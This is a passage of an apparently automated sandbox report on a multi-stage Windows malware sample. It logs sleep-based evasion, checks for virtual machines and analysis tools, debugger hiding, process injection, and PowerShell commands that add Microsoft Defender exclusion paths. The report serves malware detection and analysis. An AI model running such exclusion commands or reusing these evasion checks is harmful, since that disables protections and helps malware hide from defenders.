                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 4612Thread sleep time: -2353176s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 5432Thread sleep count: 1217 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 5432Thread sleep time: -2435217s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 5824Thread sleep time: -44000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 944Thread sleep count: 1168 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 944Thread sleep time: -2337168s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 7932Thread sleep count: 1196 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 7932Thread sleep time: -2393196s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 7612Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 5272Thread sleep count: 1191 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 5272Thread sleep time: -2383191s >= -30000s
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe TID: 4420Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe TID: 4268Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe TID: 504Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 3004Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 2844Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 5016Thread sleep count: 807 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 5016Thread sleep time: -1614807s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 1308Thread sleep count: 749 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 1308Thread sleep time: -1498749s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 3272Thread sleep count: 175 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 3272Thread sleep count: 58 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 3272Thread sleep count: 61 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 3272Thread sleep count: 63 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 4480Thread sleep count: 863 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 4480Thread sleep time: -1726863s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 6036Thread sleep count: 821 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 6036Thread sleep time: -1642821s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 3128Thread sleep count: 3271 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 3128Thread sleep time: -6545271s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 4820Thread sleep count: 837 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 4820Thread sleep time: -1674837s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe TID: 6872Thread sleep time: -46023s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe TID: 7296Thread sleep time: -90000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe TID: 6544Thread sleep time: -30015s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe TID: 6588Thread sleep time: -40020s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe TID: 1196Thread sleep time: -38019s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9012Thread sleep count: 96 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3448Thread sleep count: 134 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe TID: 7328Thread sleep time: -50025s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe TID: 7320Thread sleep time: -52026s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe TID: 7336Thread sleep time: -30015s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe TID: 3208Thread sleep time: -32000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe TID: 5596Thread sleep time: -32016s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe TID: 7332Thread sleep time: -54027s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe TID: 3008Thread sleep time: -90000s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                      Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001D7978 FindFirstFileW,FindFirstFileW,free,11_2_001D7978
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001D881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,11_2_001D881C
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001DB5E0 GetSystemInfo,11_2_001DB5E0
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 99868Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 99762Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 99655Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 99544Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 99422Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 99313Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 99203Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 99094Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98960Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98844Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98719Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98609Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98500Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98391Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98281Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98172Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98063Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 97952Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 97842Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 97733Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 97610Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 97497Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 97375Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 97256Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 97092Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 96899Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 96794Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 96672Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 96563Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 96453Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 96344Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 96225Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 96110Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 95985Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 95860Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 95735Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 95610Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 95485Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 95360Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 95235Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 95125Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 94985Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 94875Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 94759Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 94702Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 94589Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 94431Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 94322Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeThread delayed: delay time: 922337203685477
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeThread delayed: delay time: 922337203685477
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                      Source: file.exe, file.exe, 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, skotes.exe, 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmp, 513dad5c05.exe, 00000038.00000000.2960899475.00000000005B3000.00000080.00000001.01000000.0000001F.sdmp, 77594b3442.exe, 00000039.00000002.3105827870.0000000000DB1000.00000040.00000001.01000000.0000001E.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2718978923.0000000006921000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlM!Nq
                      Source: 4268204ace.exe, 0000000F.00000002.2724972964.0000000000F35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 9d4ddc637a.exe, 0000003A.00000003.3172152850.000000000145D000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3172750796.0000000001462000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3173171015.0000000001484000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW[
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2776399397.0000000000790000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWq
                      Source: explorer.exe, 00000024.00000002.2597232510.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2776399397.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005562000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3228694024.0000000005562000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005562000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005562000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000033.00000002.2933758160.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3103939592.000000000052F000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000003.3063497186.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104578420.0000000000575000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
                      Source: 9d4ddc637a.exe, 0000003A.00000003.3072055372.000000000149E000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3070055308.000000000149E000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3156789916.000000000149E000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3067000375.000000000149E000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3045078528.000000000149D000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3052397925.000000000149E000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3067634761.000000000149E000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3064614251.000000000149E000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3124704947.000000000149E000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3068403237.000000000149E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWQIue
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2823276319.00000220F1D8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
                      Source: file.exe, 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmp, 77594b3442.exe, 00000039.00000002.3105827870.0000000000DB1000.00000040.00000001.01000000.0000001E.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                      Source: 513dad5c05.exe, 00000038.00000000.2960899475.00000000005B3000.00000080.00000001.01000000.0000001F.sdmpBinary or memory string: \\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                      Source: 4268204ace.exe, 0000000F.00000002.2724972964.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000001F.00000002.2607791227.0000017A9D4B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: PING.EXE, 00000027.00000002.2631965049.000002202AB29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllnn
                      Source: explorer.exe, 00000033.00000002.2933758160.0000000000BE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpv
                      Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeOpen window title or class name: regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeOpen window title or class name: gbdyllo
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeOpen window title or class name: procmon_window_class
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeOpen window title or class name: ollydbg
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeOpen window title or class name: filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: NTICE
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: SICE
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: SIWVID
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSystem information queried: KernelDebuggerInformation
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
                      Source: C:\Windows\explorer.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Process queried: DebugPort
                      Source: C:\Windows\explorer.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Process queried: DebugPort
                      Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_048A0CCD rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exe | Code function: 11_2_002166A8 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs
                      Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0008652B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0008A302 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 1_2_0072A302 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 1_2_0072652B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Process token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe | Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: Yara match | File source: Process Memory Space: 4268204ace.exe PID: 7312, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: 7d28d37061cb43098969a37cf25a380a.exe PID: 5916, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: 513dad5c05.exe PID: 7432, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs"
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 2368 base: 140000000 value: 4D
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 2368 base: 140001000 value: 40
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 2368 base: 1402DD000 value: 58
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 2368 base: 14040B000 value: A4
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 2368 base: 140739000 value: 00
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 2368 base: 14075E000 value: 48
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 2368 base: 14075F000 value: 48
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 2368 base: 140762000 value: 48
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 2368 base: 140764000 value: 00
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 2368 base: 140765000 value: 00
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 2368 base: BEB010 value: 00
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 7580 base: 140000000 value: 4D
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 7580 base: 140001000 value: 40
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 7580 base: 1402DD000 value: 58
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 7580 base: 14040B000 value: A4
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 7580 base: 140739000 value: 00
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 7580 base: 14075E000 value: 48
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 7580 base: 14075F000 value: 48
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 7580 base: 140762000 value: 48
